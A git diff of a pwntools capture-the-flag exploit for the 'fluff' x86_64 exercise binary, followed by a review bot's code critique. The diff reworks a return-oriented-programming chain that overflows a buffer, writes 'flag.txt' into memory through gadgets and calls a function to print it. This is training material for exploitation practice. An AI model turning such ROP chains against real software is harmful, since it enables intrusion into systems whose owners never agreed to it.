Diffstat (limited to 'x86_64/fluff/exploit.py')
-rwxr-xr-xx86_64/fluff/exploit.py30
1 files changed, 14 insertions, 16 deletions
diff --git a/x86_64/fluff/exploit.py b/x86_64/fluff/exploit.py
index cdf5de8..2b520d8 100755
--- a/x86_64/fluff/exploit.py
+++ b/x86_64/fluff/exploit.py
@@ -13,37 +13,35 @@ letter_lookups = {
def write_str(dest, string, payload):
payload += p64(0x00000000004006a3)
payload += p64(dest)
- for c in string:
- payload += p64(0x40062a)
- payload += p64(0x4000) # if things go wrong, check endian/order
+ payload += p64(0x0000000000400610)
+ payload += p64(1)
+ payload += p64(0x40062a)
+ payload += p64(0x4000)
+ payload += p64(letter_lookups[string[0]] - 0x3ef2)
+ payload += p64(0x400628)
+ payload += p64(0x400639)
+
+
+ for c in string[1:]:
+ payload += p64(0x40062b)
payload += p64(letter_lookups[c] - 0x3ef2)
-
payload += p64(0x0000000000400610)
- payload += p64(0)
-
+ payload += p64(1)
payload += p64(0x400628)
-
payload += p64(0x400639)
return(payload)
-prog = gdb.debug('./fluff', gdbscript='''
-break *pwnme + 151
-'''
-)
+prog = process('./fluff')
payload = b''
for c in range(40):
payload += b'a'
payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)
payload += p64(0x00000000004006a3)
-payload += p64(0x601be0) # set rdi
-
+payload += p64(0x601be0)
payload += p64(0x0000000000400510)
-payload += b"\n"
prog.sendline(payload)
-sleep(1)
-print(str(prog.recv(), 'UTF-8'))
prog.interactive()
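Review bot: The write target is spelled two different ways on the new side — `0x0000000000600df0 + 0x00000df0` on the `write_str` call and the bare literal `0x601be0` three lines later before the final call gadget — and nothing ties them together, so editing one silently desynchronises the written string from the pointer handed to the callee; define it once, `DEST = 0x601be0`, and use it in both places. The commit also deletes the only comments that named what the chain does (`# set rdi`), leaving eight unexplained addresses inside `write_str`; naming them as constants (`POP_RDI = 0x0000000000004006a3` and so on, with the gadget semantics confirmed against the binary rather than guessed) would make the first-character block versus the per-character loop readable. `write_str` now indexes `string[0]` unconditionally and will raise `IndexError` on an empty string and `KeyError` for any character absent from `letter_lookups`; a guard such as `assert string and all(c in letter_lookups for c in string), string` gives a clearer failure than a traceback mid-chain. `letter_lookups` itself is defined above the hunk, so its coverage cannot be checked from here.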